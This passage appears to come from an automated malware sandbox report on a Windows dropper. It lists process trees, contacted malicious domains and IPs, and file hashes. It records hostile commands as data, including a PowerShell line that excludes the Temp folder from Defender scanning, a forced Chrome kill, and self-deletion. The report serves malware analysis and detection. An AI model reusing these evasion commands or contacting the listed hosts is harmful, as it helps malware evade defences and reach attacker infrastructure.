PID 1084 wrote to memory of 676 N/A C:\Users\Admin\AppData\Local\Temp\a4806a7fffe5d04d7ccd764890bd4ef3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1084 wrote to memory of 676 N/A C:\Users\Admin\AppData\Local\Temp\a4806a7fffe5d04d7ccd764890bd4ef3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1084 wrote to memory of 676 N/A C:\Users\Admin\AppData\Local\Temp\a4806a7fffe5d04d7ccd764890bd4ef3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 676 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe
PID 676 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe
PID 676 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe
PID 676 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe
PID 676 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe
PID 676 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe
PID 676 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe
PID 568 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a4806a7fffe5d04d7ccd764890bd4ef3.exe

"C:\Users\Admin\AppData\Local\Temp\a4806a7fffe5d04d7ccd764890bd4ef3.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22398ca1246818a50.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22214190470.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed226b251ef55.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed2236d9fce9bd29d13.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed2246f9dc6f4f9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed2260b25c317.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed229825989c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed222a0abb0f39640f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed226b6e8b18c18b003.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22d29285f2462824d.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed224b216a9b264.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed22214190470.exe

Wed22214190470.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed221ce23cd2c4a6.exe

C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed2236d9fce9bd29d13.exe

Wed2236d9fce9bd29d13.exe

C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b6e8b18c18b003.exe

Wed226b6e8b18c18b003.exe

C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed224b216a9b264.exe

Wed224b216a9b264.exe

C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed22d29285f2462824d.exe

Wed22d29285f2462824d.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed2260b25c317.exe

Wed2260b25c317.exe

C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed222a0abb0f39640f.exe

Wed222a0abb0f39640f.exe

C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed221ce23cd2c4a6.exe

Wed221ce23cd2c4a6.exe

C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed229825989c.exe

Wed229825989c.exe

C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed226b251ef55.exe

Wed226b251ef55.exe

C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed2246f9dc6f4f9.exe

Wed2246f9dc6f4f9.exe

C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed22398ca1246818a50.exe

Wed22398ca1246818a50.exe

C:\Users\Admin\AppData\Local\Temp\is-LHBKN.tmp\Wed221ce23cd2c4a6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-LHBKN.tmp\Wed221ce23cd2c4a6.tmp" /SL5="$4012A,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed221ce23cd2c4a6.exe"

C:\Users\Admin\AppData\Local\Temp\is-T9R74.tmp\___YHDG34.exe

"C:\Users\Admin\AppData\Local\Temp\is-T9R74.tmp\___YHDG34.exe" /S /UID=burnerch2

C:\Users\Admin\Documents\gV5_qREmMKI_6lOblOkVX0aa.exe

"C:\Users\Admin\Documents\gV5_qREmMKI_6lOblOkVX0aa.exe"

C:\Users\Admin\Documents\jTci8GISWx_IFUTxpgWUr3sX.exe

"C:\Users\Admin\Documents\jTci8GISWx_IFUTxpgWUr3sX.exe"

C:\Users\Admin\Documents\tO6sogqHQdy3HIA94Ycqx6lv.exe

"C:\Users\Admin\Documents\tO6sogqHQdy3HIA94Ycqx6lv.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\Documents\7j28K7WZY6wvYlK3bWw4Tj_h.exe

"C:\Users\Admin\Documents\7j28K7WZY6wvYlK3bWw4Tj_h.exe"

C:\Users\Admin\Documents\EjH5V3a6XQstM2L6JIO0uNZ1.exe

"C:\Users\Admin\Documents\EjH5V3a6XQstM2L6JIO0uNZ1.exe"

C:\Users\Admin\Documents\OPa060FRnsQzjKAo05xOd2bC.exe

"C:\Users\Admin\Documents\OPa060FRnsQzjKAo05xOd2bC.exe"

C:\Users\Admin\Documents\pSeQc5u5rark9Dv4GcnhUvq_.exe

"C:\Users\Admin\Documents\pSeQc5u5rark9Dv4GcnhUvq_.exe"

C:\Users\Admin\Documents\LKsh8uRQwtnFW_5JmjfTPLiw.exe

"C:\Users\Admin\Documents\LKsh8uRQwtnFW_5JmjfTPLiw.exe"

C:\Users\Admin\Documents\6s615KAN_OFdlVtQ9NEL9ITb.exe

"C:\Users\Admin\Documents\6s615KAN_OFdlVtQ9NEL9ITb.exe"

C:\Users\Admin\Documents\j_83k7Iq9WNu_Erhh9pEXFr7.exe

"C:\Users\Admin\Documents\j_83k7Iq9WNu_Erhh9pEXFr7.exe"

C:\Users\Admin\Documents\IDjQDxtS3uCwOqbAOvaBIRhl.exe

"C:\Users\Admin\Documents\IDjQDxtS3uCwOqbAOvaBIRhl.exe"

C:\Users\Admin\Documents\koQNDsmBAHP_U4U0MZU6_Hva.exe

"C:\Users\Admin\Documents\koQNDsmBAHP_U4U0MZU6_Hva.exe"

C:\Users\Admin\Documents\I4suq4baalNiIRI__SzQUwlM.exe

"C:\Users\Admin\Documents\I4suq4baalNiIRI__SzQUwlM.exe"

C:\Users\Admin\Documents\PNvn3wPaQBrkD6HOzcvvI9Gm.exe

"C:\Users\Admin\Documents\PNvn3wPaQBrkD6HOzcvvI9Gm.exe"

C:\Users\Admin\Documents\bH3bSfl1i1yfku63uOBRHimT.exe

"C:\Users\Admin\Documents\bH3bSfl1i1yfku63uOBRHimT.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Users\Admin\Documents\gWhhFhi5bw0u1GKD7eztVJig.exe

"C:\Users\Admin\Documents\gWhhFhi5bw0u1GKD7eztVJig.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed2260b25c317.exe

C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed2260b25c317.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 364 -s 976

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed22d29285f2462824d.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4A2472C2\Wed22d29285f2462824d.exe" & exit

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe

"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"

C:\Program Files (x86)\Company\NewProduct\cm3.exe

"C:\Program Files (x86)\Company\NewProduct\cm3.exe"

C:\Program Files (x86)\Company\NewProduct\inst001.exe

"C:\Program Files (x86)\Company\NewProduct\inst001.exe"

C:\Users\Admin\AppData\Local\Temp\3BB8.exe

C:\Users\Admin\AppData\Local\Temp\3BB8.exe

C:\Users\Admin\Documents\2rXCiy6HFhIimKl9IfSx2oSM.exe

"C:\Users\Admin\Documents\2rXCiy6HFhIimKl9IfSx2oSM.exe"

C:\Users\Admin\Documents\A97NUu5WKSsgKcd2rwxwwF6R.exe

"C:\Users\Admin\Documents\A97NUu5WKSsgKcd2rwxwwF6R.exe"

C:\Users\Admin\Documents\SxR0EX6mi_NVVSciyZ7jXNSi.exe

"C:\Users\Admin\Documents\SxR0EX6mi_NVVSciyZ7jXNSi.exe"

C:\Users\Admin\Documents\iDp0vEoJvpsoYDi_0VPPLotx.exe

"C:\Users\Admin\Documents\iDp0vEoJvpsoYDi_0VPPLotx.exe"

C:\Users\Admin\Documents\EjH5V3a6XQstM2L6JIO0uNZ1.exe

C:\Users\Admin\Documents\EjH5V3a6XQstM2L6JIO0uNZ1.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 hsiens.xyz udp
US 104.21.87.76:80 hsiens.xyz tcp
NL 37.0.10.214:80 37.0.10.214 tcp
NL 45.144.225.236:80 45.144.225.236 tcp
N/A 127.0.0.1:49223 tcp
N/A 127.0.0.1:49225 tcp
US 8.8.8.8:53 www.listincode.com udp
US 144.202.76.47:443 www.listincode.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 45.136.151.102:80 staticimg.youtuuee.com tcp
US 8.8.8.8:53 statuse.digitalcertvalidation.com udp
US 72.21.91.29:80 statuse.digitalcertvalidation.com tcp
US 8.8.8.8:53 safialinks.com udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 iplogger.org udp
DE 88.99.66.31:443 iplogger.org tcp
US 162.0.214.42:80 safialinks.com tcp
NL 45.144.225.236:80 45.144.225.236 tcp
US 8.8.8.8:53 dimonbk83.tumblr.com udp
US 8.8.8.8:53 cleaner-partners.biz udp
US 8.8.8.8:53 ic-9a3d4700-1475e2-windowsupdate61.s.loris.llnwd.net udp
US 74.114.154.18:443 dimonbk83.tumblr.com tcp
NL 87.248.203.30:80 ic-9a3d4700-1475e2-windowsupdate61.s.loris.llnwd.net tcp
IT 179.43.128.2:80 cleaner-partners.biz tcp
NL 37.0.10.244:80 37.0.10.244 tcp
RU 193.53.127.10:80 cleaner-partners.biz tcp
NL 87.248.203.30:80 ic-9a3d4700-1475e2-windowsupdate61.s.loris.llnwd.net tcp
NL 45.144.225.236:80 45.144.225.236 tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 dependstar.bar udp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
NL 37.0.10.214:80 37.0.10.214 tcp
NL 37.0.10.214:80 37.0.10.214 tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
MD 45.140.146.242:80 45.140.146.242 tcp
US 8.8.8.8:53 www.svanaturals.com udp
US 72.167.225.156:80 www.svanaturals.com tcp
US 8.8.8.8:53 privacytoolz123foryou.top udp
RU 45.144.67.29:80 privacytoolz123foryou.top tcp
US 8.8.8.8:53 installcb.ru udp
RU 31.31.196.204:80 installcb.ru tcp
US 72.167.225.156:80 www.svanaturals.com tcp
US 72.167.225.156:80 www.svanaturals.com tcp
US 72.167.225.156:80 www.svanaturals.com tcp
US 104.21.14.200:443 dependstar.bar tcp
US 8.8.8.8:53 www.invch.com udp
US 8.8.8.8:53 installs.online udp
US 208.113.171.56:80 installs.online tcp
NL 103.155.93.196:80 www.invch.com tcp
US 208.113.171.56:80 installs.online tcp
US 208.113.171.56:80 installs.online tcp
US 208.113.171.56:80 installs.online tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 151.139.128.14:80 crl.usertrust.com tcp
DE 88.99.66.31:443 iplogger.org tcp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 varmisende.com udp
US 8.8.8.8:53 fernandomayol.com udp
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
PK 124.109.61.160:80 fernandomayol.com tcp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.129:443 twitter.com tcp
US 104.244.42.129:443 twitter.com tcp
US 8.8.8.8:53 yandex.ru udp
RU 5.255.255.5:443 yandex.ru tcp
PK 124.109.61.160:80 fernandomayol.com tcp
PK 124.109.61.160:80 fernandomayol.com tcp
US 8.8.8.8:53 connectini.net udp
US 8.8.8.8:53 www.iyiqian.com udp
RU 103.155.92.58:80 www.iyiqian.com tcp
US 162.0.210.44:443 connectini.net tcp
MY 103.169.90.205:80 103.169.90.205 tcp
NL 37.0.10.214:80 37.0.10.214 tcp
US 208.113.171.56:443 installs.online tcp
RU 45.144.67.29:80 privacytoolz123foryou.top tcp
US 72.167.225.156:443 www.svanaturals.com tcp
NL 37.0.10.214:80 37.0.10.214 tcp
US 8.8.8.8:53 www.wsrygoq.com udp
US 8.8.8.8:53 repository.certum.pl udp
NL 104.110.191.15:80 repository.certum.pl tcp
RU 188.225.87.175:80 www.wsrygoq.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 45.136.151.102:80 staticimg.youtuuee.com tcp
NL 37.0.10.214:80 37.0.10.214 tcp
NL 45.144.225.236:80 45.144.225.236 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
RU 186.2.171.3:80 186.2.171.3 tcp
DE 88.99.66.31:443 iplogger.org tcp

Files

memory/1084-53-0x0000000075631000-0x0000000075633000-memory.dmp

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 23f95535fc3ed2f0496274d3b85d3dc6
SHA1 f70346f799fbee99e5290cad03c826b2943caf43
SHA256 aca086f053aa1bc8c365773b383dd9eb4b10ab6e8e8138321336af3e2d59bfcb
SHA512 cc38b94f733bbf2eb4c22b039a2a2046862e3a041bcd2df4fc02b0616b2b19301f5be9c6058bcff25bd270081de861ae3cf820d0a517b9d08b72fc65677378b5

memory/676-55-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 23f95535fc3ed2f0496274d3b85d3dc6
SHA1 f70346f799fbee99e5290cad03c826b2943caf43
SHA256 aca086f053aa1bc8c365773b383dd9eb4b10ab6e8e8138321336af3e2d59bfcb
SHA512 cc38b94f733bbf2eb4c22b039a2a2046862e3a041bcd2df4fc02b0616b2b19301f5be9c6058bcff25bd270081de861ae3cf820d0a517b9d08b72fc65677378b5

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 23f95535fc3ed2f0496274d3b85d3dc6
SHA1 f70346f799fbee99e5290cad03c826b2943caf43
SHA256 aca086f053aa1bc8c365773b383dd9eb4b10ab6e8e8138321336af3e2d59bfcb
SHA512 cc38b94f733bbf2eb4c22b039a2a2046862e3a041bcd2df4fc02b0616b2b19301f5be9c6058bcff25bd270081de861ae3cf820d0a517b9d08b72fc65677378b5

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 23f95535fc3ed2f0496274d3b85d3dc6
SHA1 f70346f799fbee99e5290cad03c826b2943caf43
SHA256 aca086f053aa1bc8c365773b383dd9eb4b10ab6e8e8138321336af3e2d59bfcb
SHA512 cc38b94f733bbf2eb4c22b039a2a2046862e3a041bcd2df4fc02b0616b2b19301f5be9c6058bcff25bd270081de861ae3cf820d0a517b9d08b72fc65677378b5

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 23f95535fc3ed2f0496274d3b85d3dc6
SHA1 f70346f799fbee99e5290cad03c826b2943caf43
SHA256 aca086f053aa1bc8c365773b383dd9eb4b10ab6e8e8138321336af3e2d59bfcb
SHA512 cc38b94f733bbf2eb4c22b039a2a2046862e3a041bcd2df4fc02b0616b2b19301f5be9c6058bcff25bd270081de861ae3cf820d0a517b9d08b72fc65677378b5

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 23f95535fc3ed2f0496274d3b85d3dc6
SHA1 f70346f799fbee99e5290cad03c826b2943caf43
SHA256 aca086f053aa1bc8c365773b383dd9eb4b10ab6e8e8138321336af3e2d59bfcb
SHA512 cc38b94f733bbf2eb4c22b039a2a2046862e3a041bcd2df4fc02b0616b2b19301f5be9c6058bcff25bd270081de861ae3cf820d0a517b9d08b72fc65677378b5

\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe

MD5 b359a4d6960337848e0fa5f3fb9640ce
SHA1 9289ae13910928dda2d7d061bd7051aa43372efd
SHA256 e3c6aae2ca48f07795260e7ed11b8386089b25a06dab2716f8c5a17130db1c73
SHA512 4690034ad8b1bc93a4b993a8a9705fde177373b064e16529b86c35cf79bd6dcee537def749aacd6d9d8ac08539b16e8dd7b744214d42e097fbaa020f7ccf65b0

\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe

MD5 b359a4d6960337848e0fa5f3fb9640ce
SHA1 9289ae13910928dda2d7d061bd7051aa43372efd
SHA256 e3c6aae2ca48f07795260e7ed11b8386089b25a06dab2716f8c5a17130db1c73
SHA512 4690034ad8b1bc93a4b993a8a9705fde177373b064e16529b86c35cf79bd6dcee537def749aacd6d9d8ac08539b16e8dd7b744214d42e097fbaa020f7ccf65b0

\Users\Admin\AppData\Local\Temp\7zS4A2472C2\setup_install.exe

MD5 b359a4d6960337848e0fa5f3fb9640ce
SHA1 9289ae13910928dda2d7d061bd7051aa43372efd
